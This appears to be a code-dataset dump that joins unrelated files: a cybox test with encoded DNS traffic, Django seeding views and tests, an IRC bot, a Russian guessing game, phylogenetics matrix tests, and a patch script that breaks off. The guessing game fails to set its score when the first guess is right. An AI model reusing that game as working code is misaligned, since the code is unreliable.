"raw_artifact": "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"
"AlgAECABBPgAAAACAAAAAAAAAA3ADAABAAEAAAJYAATMmLhYwWhKQrQ/CwBSAAAA"
"UgAAAADAnzJBjADgGLEMrQgARQAARAAAQABAEWU7wKiqCMCoqhSAHAA1ADACNVpT"
"AQAAAQAAAAAAAAExATABMAMxMjcHaW4tYWRkcgRhcnBhAAAMAAHBaEpCAEILAGkA"
"AABpAAAAAOAYsQytAMCfMkGMCABFAABb2PUAAIARjC7AqKoUwKiqCAA1gBwAR/kw"
"WlOFgAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAA"
"DhAACwlsb2NhbGhvc3QAwWhKQkZLCwBDAAAAQwAAAADAnzJBjADgGLEMrQgARQAA"
"NQAAQABAEWVKwKiqCMCoqhSAHQA1ACGYvSCKAQAAAQAAAAAAAANpc2MDb3JnAAAC"
"AAHBaEpC2ogLAIEAAACBAAAAABKpADIjAGAIReRVCABFAABzh94AAIARapXAqKo4"
"2Q0EGAarADUAXznwMm4BAAABAAAAAAAABV9sZGFwBF90Y3AXRGVmYXVsdC1GaXJz"
"dC1TaXRlLU5hbWUGX3NpdGVzAmRjBl9tc2Rjcwt1dGVsc3lzdGVtcwVsb2NhbAAA"
"IQABwWhKQrWSCwCmAAAApgAAAADgGLEMrQDAnzJBjAgARQAAmNj3AACAEYvvwKiq"
"FMCoqggANYAdAIR72CCKgYAAAQAEAAAAAANpc2MDb3JnAAACAAHADAACAAEAAA4Q"
"AA4GbnMtZXh0BG5ydDHADMAMAAIAAQAADhAADgZucy1leHQEc3RoMcAMwAwAAgAB"
"AAAOEAAJBm5zLWV4dMAMwAwAAgABAAAOEAAOBm5zLWV4dARsZ2ExwAzBaEpCPdYL"
"AIEAAACBAAAAAGAIReRVABKpADIjCABFAABzAABAADoR+HPZDQQYwKiqOAA1BqsA"
"X7VsMm6FgwABAAAAAAAABV9sZGFwBF90Y3AXRGVmYXVsdC1GaXJzdC1TaXRlLU5h"
"bWUGX3NpdGVzAmRjBl9tc2Rjcwt1dGVsc3lzdGVtcwVsb2NhbAAAIQABwWhKQszY"
"CwBiAAAAYgAAAAASqQAyIwBgCEXkVQgARQAAVIfwAACAEWqiwKiqONkNBBgGrAA1"
"AEB8UfFhAQAAAQAAAAAAAAVfbGRhcARfdGNwAmRjBl9tc2Rjcwt1dGVsc3lzdGVt"
"cwVsb2NhbAAAIQABwWhKQmEcDABiAAAAYgAAAABgCEXkVQASqQAyIwgARQAAVAAA"
"QAA6EfiS2Q0EGMCoqjgANQasAED3zfFhhYMAAQAAAAAAAAVfbGRhcARfdGNwAmRj"
"Bl9tc2Rjcwt1dGVsc3lzdGVtcwVsb2NhbAAAIQABwWhKQoAeDACMAAAAjAAAAAAS"
"qQAyIwBgCEXkVQgARQAAfofxAACAEWp3wKiqONkNBBgGrQA1AGp3mINhAQAAAQAA"
"AAAAAAVfbGRhcARfdGNwJDA1YjUyOTJiLTM0YjgtNGZiNy04NWEzLThiZWVmNWZk"
"MjA2OQdkb21haW5zBl9tc2Rjcwt1dGVsc3lzdGVtcwVsb2NhbAAAIQABwWhKQmRr"
"DACMAAAAjAAAAABgCEXkVQASqQAyIwgARQAAfgAAQAA6Efho2Q0EGMCoqjgANQat"
"AGrzFINhhYMAAQAAAAAAAAVfbGRhcARfdGNwJDA1YjUyOTJiLTM0YjgtNGZiNy04"
"NWEzLThiZWVmNWZkMjA2OQdkb21haW5zBl9tc2Rjcwt1dGVsc3lzdGVtcwVsb2Nh"
"bAAAIQABwWhKQvn4DQBTAAAAUwAAAAASqQAyIwBgCEXkVQgARQAARYf1AACAEWqs"
"wKiqONkNBBgGrgA1ADEajdBgAQAAAQAAAAAAAAVHUklNTQt1dGVsc3lzdGVtcwVs"
"b2NhbAAAAQABwWhKQhU7DgBTAAAAUwAAAABgCEXkVQASqQAyIwgARQAARQAAQAA6"
"Efih2Q0EGMCoqjgANQauADGWCdBghYMAAQAAAAAAAAVHUklNTQt1dGVsc3lzdGVt"
"cwVsb2NhbAAAAQAByWhKQuJzBQBTAAAAUwAAAAASqQAyIwBgCEXkVQgARQAARYf7"
"AACAEWqmwKiqONkNBBgGrwA1ADF0iXZjAQAAAQAAAAAAAAVHUklNTQt1dGVsc3lz"
"dGVtcwVsb2NhbAAAAQAByWhKQj+6BQBTAAAAUwAAAABgCEXkVQASqQAyIwgARQAA"
"RQAAQAA6Efih2Q0EGMCoqjgANQavADHwBXZjhYMAAQAAAAAAAAVHUklNTQt1dGVs"
"c3lzdGVtcwVsb2NhbAAAAQAB",
"type": "Network Traffic"
}
class TestArtifactPattern(ObjectTestCase, unittest.TestCase):
object_type = "ArtifactObjectType"
klass = Artifact
_full_dict = {
"xsi:type": object_type,
"raw_artifact": {
"value": "777777076578616D706C6503636F6D",
"condition": "Contains"
},
"type": "Network Traffic"
}
def _get_data(artifact):
return artifact.data
def _set_data(artifact, data):
artifact.data = data
def _get_packed_data(artifact):
return artifact.packed_data
def _set_packed_data(artifact, packed_data):
artifact.packed_data = packed_data
if __name__ == "__main__":
unittest.main()
| bsd-3-clause | -5,257,391,500,111,791,000 | 48.567823 | 109 | 0.669 | false |
miguelut/utmbu | dev/views.py | 1 | 8285 | from django.shortcuts import render, redirect
from django.contrib.auth.models import User, Permission
from django.contrib.auth.hashers import make_password
from django.contrib.contenttypes.models import ContentType
from mbu.models import *
from datetime import date, datetime
import os
# Create your views here.
def setup_data(request):
insert_courses()
# councils = create_councils()
# troop, create = Troop.objects.get_or_create(number=int('464'), council=councils[0])
# mbu, create = MeritBadgeUniversity.objects.get_or_create(name='MBU 2015', year=date.today(), current=True)
# timeblocks = create_timeblocks(mbu)
# courses = seed_courses()
# course_instances = create_course_instances(courses, timeblocks)
# user1, create = User.objects.get_or_create(first_name='First1', last_name='Last1', email="[email protected]", username='test1', password=make_password('test1'))
# user2, create = User.objects.get_or_create(first_name='First2', last_name='Last2', email="[email protected]", username='test2', password=make_password('test2'))
# ct = ContentType.objects.get_for_model(Scout)
# p = Permission.objects.get(content_type=ct, codename='edit_scout_schedule')
# user1.user_permissions.add(p)
# user2.user_permissions.add(p)
# scout1, create = Scout.objects.get_or_create(user=user1, rank='Star', troop=troop, waiver=False)
# scout2, create = Scout.objects.get_or_create(user=user2, rank='Star', troop=troop, waiver=False)
return redirect('mbu_home')
def seed_courses():
result = []
files = os.listdir('./static/images/badges')
for file in files:
name = file.replace('_',' ').replace('.jpg', '')
course, create = Course.objects.get_or_create(name=name, image_name=file)
result.append(course)
return result
def create_timeblocks(mbu):
result = []
timeblock1, create = TimeBlock.objects.get_or_create(name='Session 1', start_time=datetime(2015,2,14,8,0,0), end_time=datetime(2015,2,14,10,0,0), mbu=mbu)
timeblock2, create = TimeBlock.objects.get_or_create(name='Session 2', start_time=datetime(2015,2,14,10,0,0), end_time=datetime(2015,2,14,12,0,0), mbu=mbu)
timeblock3, create = TimeBlock.objects.get_or_create(name='Session 3', start_time=datetime(2015,2,14,13,0,0), end_time=datetime(2015,2,14,15,0,0), mbu=mbu)
timeblock4, create = TimeBlock.objects.get_or_create(name='Session 4', start_time=datetime(2015,2,14,15,0,0), end_time=datetime(2015,2,14,17,0,0), mbu=mbu)
timeblock5, create = TimeBlock.objects.get_or_create(name='Session 1-Double', start_time=datetime(2015,2,14,8,0,0), end_time=datetime(2015,2,14,12,0,0), mbu=mbu, double=True)
timeblock6, create = TimeBlock.objects.get_or_create(name='Session 3-Double', start_time=datetime(2015,2,14,13,0,0), end_time=datetime(2015,2,14,17,0,0), mbu=mbu, double=True)
result.append(timeblock1)
result.append(timeblock2)
result.append(timeblock3)
result.append(timeblock4)
result.append(timeblock5)
result.append(timeblock6)
return result
def create_course_instances(courses, timeblocks):
result = []
mod = len(timeblocks)
for idx, val in enumerate(courses):
timeblock = timeblocks[idx % mod]
course_instance, create = ScoutCourseInstance.objects.get_or_create(course=val, timeblock=timeblock, location='Room %s' % str(idx), max_enrollees=10)
result.append(course_instance)
return result
def create_councils():
result = []
with open('./dev/councils.csv', 'r') as lines:
for line in lines:
number, name, city, state = line.strip().split(',')
council, create = Council.objects.get_or_create(number=int(number), name=name, city=city, state=state)
result.append(council)
return result
def insert_courses():
assignments = [
("American Business", 1),
("American Cultures", 2),
("American Labor", 3),
("Animation", 1),
("Animation", 2),
("Animation", 3),
("Animation", 4),
("Architecture", 5),
("Architecture", 6),
("Archaeology", 3),
("Art", 1),
("Art", 2),
("Art", 3),
("Art", 4),
("Aviation", 1),
("Aviation", 2),
("Chess", 1),
("Chess", 2),
("Chess", 3),
("Chess", 4),
("Chemistry", 1),
("Chemistry", 2),
("Chemistry", 3),
("Chemistry", 4),
("Citizenship in the Community", 1),
("Citizenship in the Community", 2),
("Citizenship in the Community", 3),
("Citizenship in the Community", 4),
("Citizenship in the Community", 1),
("Citizenship in the Community", 2),
("Citizenship in the Community", 3),
("Citizenship in the Community", 4),
("Citizenship in the Nation", 5),
("Citizenship in the Nation", 6),
("Citizenship in the Nation", 5),
("Citizenship in the Nation", 6),
("Citizenship in the World", 1),
("Citizenship in the World", 2),
("Citizenship in the World", 3),
("Citizenship in the World", 4),
("Citizenship in the World", 1),
("Citizenship in the World", 2),
("Citizenship in the World", 3),
("Communication", 1),
("Communication", 2),
("Communication", 3),
("Communication", 4),
("Communication", 1),
("Communication", 2),
("Communication", 3),
("Communication", 4),
("Cooking", 1),
("Cooking", 2),
("Cooking", 3),
("Cooking", 4),
("Cooking", 1),
("Cooking", 2),
("Cooking", 3),
("Cooking", 4),
("Crime Prevention", 3),
("Crime Prevention", 4),
("Emergency Preparedness", 1),
("Emergency Preparedness", 2),
("Emergency Preparedness", 3),
("Emergency Preparedness", 4),
("Energy", 1),
("Energy", 2),
("Engineering", 5),
("Engineering", 6),
("Family Life", 1),
("Family Life", 2),
("Family Life", 3),
("Family Life", 4),
("Family Life", 1),
("Family Life", 2),
("Family Life", 3),
("Family Life", 4),
("Fingerprinting", 1),
("Fingerprinting", 2),
("Fingerprinting", 3),
("Fingerprinting", 4),
("Fire Safety", 3),
("Fire Safety", 4),
("First Aid", 5),
("First Aid", 6),
("First Aid", 5),
("First Aid", 6),
("Geology", 4),
("Inventing", 1),
("Law", 2),
("Medicine", 5),
("Moviemaking", 1),
("Moviemaking", 2),
("Moviemaking", 3),
("Moviemaking", 4),
("Music", 1),
("Music", 2),
("Music", 3),
("Music", 4),
("Nuclear Science", 5),
("Nuclear Science", 6),
("Painting", 1),
("Painting", 2),
("Personal Fitness", 1),
("Personal Fitness", 2),
("Personal Fitness", 3),
("Personal Fitness", 4),
("Personal Management", 1),
("Personal Management", 2),
("Personal Management", 3),
("Personal Management", 4),
("Personal Management", 1),
("Personal Management", 2),
("Personal Management", 3),
("Personal Management", 4),
("Photography", 3),
("Photography", 4),
("Public Health", 3),
("Public Speaking", 4),
("Radio", 5),
("Radio", 6),
("Safety", 1),
("Salesmanship", 2),
("Scholarship", 3),
("Sculpture", 1),
("Sculpture", 2),
("Sculpture", 3),
("Sculpture", 4),
("Space Exploration", 3),
("Space Exploration", 4),
("Sports", 1),
("Sports", 2),
("Surveying", 5),
("Veterinary Medicine", 1),
("Veterinary Medicine", 2),
("Weather", 4)
]
for name, id in assignments:
max = 20
try:
badge = Course.objects.get(name=name)
timeblock = TimeBlock.objects.get(pk=id)
ScoutCourseInstance.objects.create(course=badge, timeblock=timeblock, max_enrollees=max)
except Exception as e:
print(name)
print(e) | mit | 3,891,566,924,007,851,000 | 35.502203 | 179 | 0.567532 | false |
raizkane/RaizBot | src/main.py | 1 | 2831 | #!/usr/bin/env python
'''
Copyright (C) 2015 Raiz Kane <[email protected]>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published
by the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
# Importing necessary libraries/modules
import socket
# Functions must be defined here for later execution
server = "irc.oftc.net"
channel = "#botcontrol"
botnick = "RaizBot"
def ping():
ircsock.send("PONG :pingis\n")
def sendmsg(chan, msg):
ircsock.send("PRIVMSG "+ chan +" :"+ msg +"\n")
def joinchan(chan):
ircsock.send("JOIN "+ chan +"\n")
# The whole code goes here
ircsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ircsock.connect((server, 6667))
ircsock.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :This bot is a result of a tutoral covered on http://shellium.org/wiki.\n")
ircsock.send("NICK "+ botnick +"\n")
joinchan(channel)
joinchan("#oftc-hacker")
joinchan("#nottor")
while 1:
ircmsg = ircsock.recv(2048)
ircmsg = ircmsg.strip('\n\r')
print(ircmsg)
if ircmsg.find(":#nottor, contact") != -1:
sendmsg("#nottor", "[0x2C1A25C7] Raiz Kane <[email protected]>")
sendmsg("#nottor", " E9B9 460F 0389 F4AC 713C")
sendmsg("#nottor", " EEDA 13D1 E8BF 2C1A 25C7")
if ircmsg.find(":#oftc-hacker, contact") != -1:
sendmsg("#oftc-hacker", "[0x2C1A25C7] Raiz Kane <[email protected]>")
sendmsg("#oftc-hacker", " E9B9 460F 0389 F4AC 713C")
sendmsg("#oftc-hacker", " EEDA 13D1 E8BF 2C1A 25C7")
if ircmsg.find(":#nottor, map") != -1:
sendmsg("#nottor", "OFTC channels map <https://github.com/raizkane/OFTC-channels-map> for more info visit #map.")
if ircmsg.find(":#oftc-hacker, map") != -1:
sendmsg("#oftc-hacker", "OFTC channels map <https://github.com/raizkane/OFTC-channels-map> for more info visit #map.")
if ircmsg.find(":#nottor, awesomepentest") != -1:
sendmsg("#nottor", "https://github.com/enaqx/awesome-pentest")
if ircmsg.find(":#oftc-hacker, awesomepentest") != -1:
sendmsg("#oftc-hacker", "https://github.com/enaqx/awesome-pentest")
if ircmsg.find(":#nottor, who") != -1:
sendmsg("#nottor", "Hey, I'm RaizBot, Raiz made me to make his life easier")
if ircmsg.find(":#oftc-hacker, who") != -1:
sendmsg("#oftc-hacker", "Hey, I'm RaizBot, Raiz made me to make his life easier")
if ircmsg.find("PING :") != -1:
ping()
| agpl-3.0 | 3,580,462,610,263,847,000 | 31.54023 | 136 | 0.692688 | false |
Mariaanisimova/pythonintask | PINp/2014/Valkovskey_M_A/task_7_49.py | 1 | 1588 | # Задача 7. Вариант 49.
#Разработайте систему начисления очков для задачи 6, в соответствии с которой игрок получал бы большее количество баллов за меньшее количество попыток.
#Valkovskey M.A.
import random
print("Попробуй угадать, название одного из четырнадцати гражданских чинов, занесенных в Петровскую Табель о рангах ")
a = random.choice(['Канцлер','Действительный тайный советник','Тайный советник', 'Действительный статский советник', 'Статский советник', 'Коллежский советник', 'Надворный советник ', 'Коллежский асессор', 'Титулярный советник', 'Коллежский секретарь', 'Губернский секретарь', 'Коллежский регистратор'])
b=input("Твой ответ:")
i=0
while b!=a:
print("Ты ошибся, попробуй снова")
i+=1
b=input("Твой ответ:")
else:
print("Ты абсолютно прав!")
print("Число твоих попыток: " + str(i))
if i==1:
score = 100
elif i>1:
score = 100-i*10
print("Твой финальный счет: " +str(score))
input("\nВведите Enter для завершения")
| apache-2.0 | 2,044,916,938,491,587,000 | 43.391304 | 303 | 0.695397 | false |
BurningNetel/ctf-manager | functional_tests/event/test_creating_event.py | 1 | 6665 | import time
from datetime import timedelta
from django.core.urlresolvers import reverse
from django.utils import timezone, formats
from CTFmanager.models import Event
from functional_tests.base import FunctionalTest
from functional_tests.pages.event.add_event_page import NewEventPage, NewEventPageFields
from functional_tests.pages.event.event_detail_page import EventDetailPage
from functional_tests.pages.event.event_page import EventPage
class NewEventTests(FunctionalTest):
def test_can_create_an_event_from_event_page_and_retrieve_it_later(self):
self.create_and_login_user()
ep = EventPage(self)
# a user goes to the events page
ep.get_page()
# He checks the pages' title is correct
self.assertIn(ep.title, self.browser.title)
self.assertIn(reverse(ep.name), self.browser.current_url)
# the user wants to add a new event,
# so he clicks on the button to add a new event
btn_add_event = ep.get_add_event_button()
self.assertEqual(btn_add_event.get_attribute('text'), 'Add Event')
btn_add_event.click()
nep = NewEventPage(self)
# The browser redirects to a new page
self.assertIn(reverse(nep.name), self.browser.current_url)
# The users fills in all the mandatory data
# The events name
tb_name = nep.get_name_input()
name = 'Hacklu'
tb_name.send_keys(name)
# The date and time that the event starts
datetime = nep.get_date_input()
self.assertEqual(NewEventPageFields.date_ph.value,
datetime.get_attribute('placeholder'))
# The date of the upcoming event is filled in the date textbox
datetime.clear()
_date = timezone.now() + timedelta(days=1)
formatted_date = formats.date_format(_date, "SHORT_DATETIME_FORMAT")
datetime.send_keys(str(_date.year) + '-' +
('0' + str(_date.month))[-2:] + '-' +
('0' + str(_date.day))[-2:] + " " +
str(_date.hour) + ":" +
str(_date.minute)
)
# Then, the user clicks the 'confirm' button
# when every necessary field has been filled in.
btn_confirm = nep.get_confirm_button()
self.assertEqual('btn btn-primary', btn_confirm.get_attribute('class'))
self.assertEqual('Save', btn_confirm.get_attribute('value'))
btn_confirm.click()
# The browser redirects the user to the events page
self.assertIn(reverse(ep.name), self.browser.current_url)
self.assertNotIn(reverse(nep.name), self.browser.current_url)
# The new event is now visible on the events page
lg_upcoming = ep.get_upcoming_list_group()
rows = lg_upcoming.find_elements_by_tag_name('h4')
self.assertTrue(
any(name in row.text for row in rows)
)
self.assertTrue(
any(formatted_date in row.text for row in rows)
)
# The users wants to view details about the event
# He clicks on the link that is the name of the event to go to the details page
ep.click_on_event_in_upcoming_list_group(name)
self.assertIn('CTFman - ' + name, self.browser.title)
def test_duplicate_event_test(self):
self.create_and_login_user()
# A user wants to create an event for 2015 and for 2016,
# but uses the same name
nep = NewEventPage(self).get_page()
self.assertIn(reverse(nep.name), self.browser.current_url)
# The users creates the first event, it submits correctly.
name = 'CTF' + str(round(time.time()))
date = '2016-01-01 18:00'
nep.submit_basic_event(name, date)
self.assertNotIn(reverse(nep.name), self.browser.current_url)
# The users adds another event
nep.get_page()
self.assertIn(reverse('newEvent'), self.browser.current_url)
# He uses the same name
date2 = '2015-01-01 18:00'
nep.submit_basic_event(name, date2)
# The form now shows a error
self.assertIn(reverse(nep.name), self.browser.current_url)
self.browser.find_element_by_css_selector('.has-error')
def test_new_event_with_optional_fields_filled(self):
""" This test tests the add_event form, and the event detail page for optional fields
The user is going to add a new event,
He knows a lot about the event, so he is able to fill in all optional fields too
At the end of this test, he check if the optional fields are displayed on the events detail page.
The optional fields are: Description, Location, End_Date, Credentials, URL
(hidden fields): Creation_Date, Created_By
"""
self.create_and_login_user()
# browse to new event page
nep = NewEventPage(self).get_page()
# The user fills in all the field
next_year = (timezone.now() + timedelta(days=365)).year
nep.submit_complete_event('optionalEvent',
'%s-01-01' % next_year,
'test' * 30,
'Eindhoven',
'%s-01-02' % next_year,
'CTF_TEAM_NAME',
'SECURE_PASSWORD',
'hatstack.nl',
10,
1200)
# The user is now at the events overview page.
# He now goes to it's detail page
_event = Event.objects.first()
edp = EventDetailPage(self, _event.name)
edp.get_page()
# He checks if all the information is correct
description = edp.get_description_p()
location = edp.get_location()
url = edp.get_url()
username = edp.get_password()
password = edp.get_username()
# The header contains the events title, date, end date
header = edp.get_header()
edp.toggle_credentials_panel()
# Open the hidden field
time.sleep(1) # Wait for selenium to see the hidden fields.
self.assertIn('test' * 30, description.text)
self.assertIn('Eindhoven', location.text)
self.assertIn('hatstack.nl', url.text)
self.assertIn('CTF_TEAM_NAME', username.text)
self.assertIn('SECURE_PASSWORD', password.text)
self.assertIn('Jan. 1, %s' % next_year, header.text)
self.assertIn(' - ', header.text)
self.assertIn('Jan. 2, %s' % next_year, header.text) | gpl-3.0 | -7,033,169,181,387,475,000 | 40.403727 | 105 | 0.595649 | false |
mdrasmus/spimap | test/hky.py | 1 | 2892 | """
test HKY matrix
"""
import sys, unittest, ctypes
from pprint import pprint
from math import *
sys.path.append("python")
import spidir
from test import *
from rasmus.common import *
rplot_set_viewer("display")
class HKY (unittest.TestCase):
def test_hky(self):
"""general test"""
bgfreq = [.3, .2, .3, .2]
kappa = 2.0
t = 0.2
pprint(spidir.make_hky_matrix(bgfreq, kappa, t))
pprint(phylo.make_hky_matrix(t, bgfreq, kappa))
def test_hky_deriv(self):
"""general test"""
bgfreq = [.3, .2, .3, .2]
kappa = 2.0
i = random.randint(0, 3)
j = random.randint(0, 3)
x = list(frange(0, 1.0, .01))
y = [spidir.make_hky_matrix(bgfreq, kappa, t)[i][j]
for t in x]
dy = [spidir.make_hky_deriv_matrix(bgfreq, kappa, t)[i][j]
for t in x]
dy2 = [(spidir.make_hky_matrix(bgfreq, kappa, t+.01)[i][j] -
spidir.make_hky_matrix(bgfreq, kappa, t)[i][j]) / .01
for t in x]
prep_dir("test/output/hky")
rplot_start("test/output/hky/hky_deriv.pdf")
rplot("plot", x, y, t="l", ylim=[min(dy + y), max(dy + y)])
rp.lines(x, dy, col="red")
rp.lines(x, dy2, col="blue")
rplot_end(True)
def test_hky_deriv2(self):
"""general test"""
bgfreq = [.3, .2, .3, .2]
kappa = 2.0
i = random.randint(0, 3)
j = random.randint(0, 3)
x = list(frange(0, 1.0, .01))
y = [spidir.make_hky_deriv_matrix(bgfreq, kappa, t)[i][j]
for t in x]
dy = [spidir.make_hky_deriv2_matrix(bgfreq, kappa, t)[i][j]
for t in x]
dy2 = [(spidir.make_hky_deriv_matrix(bgfreq, kappa, t+.01)[i][j] -
spidir.make_hky_deriv_matrix(bgfreq, kappa, t)[i][j]) / .01
for t in x]
prep_dir("test/output/hky2")
rplot_start("test/output/hky2/hky_deriv2.pdf")
rplot("plot", x, y, t="l", ylim=[min(dy2 + dy + y), max(dy2 + dy + y)])
rp.lines(x, dy, col="red")
rp.lines(x, dy2, col="blue")
rplot_end(True)
def test_jc(self):
"""test equivalence to JC"""
bgfreq = [.25, .25, .25, .25]
kappa = 1.0
for t in frange(0, 1.0, .1):
mat = spidir.make_hky_matrix(bgfreq, kappa, t)
a = 1/3.0
r = (1/4.0)*(1 + 3*exp(-4*a*t))
s = (1/4.0)*(1 - exp(-4*a*t))
mat2 = [[r, s, s, s],
[s, r, s, s],
[s, s, r, s],
[s, s, s, r]]
for i in xrange(4):
for j in xrange(4):
fequal(mat[i][j], mat2[i][j])
if __name__ == "__main__":
unittest.main()
| gpl-2.0 | -5,437,146,158,349,073,000 | 24.368421 | 79 | 0.458852 | false |
alepulver/changesets | patch_analyzer/patch_applicable_version.py | 1 | 2905 | import sys
import os
import patch_utils
from subprocess import Popen, PIPE, call
UTILITY_PATH = "src/main/java/"
PREFIX_BRANCH = "refs/tags/mule-"
def filter_starting_with(l, start):
return filter(lambda path: path.startswith(start), l)
def add_java(c):
return c + ".java"
def git_diff_files(git_source, v_origin, v_destination):
working_dir = os.getcwd()
try:
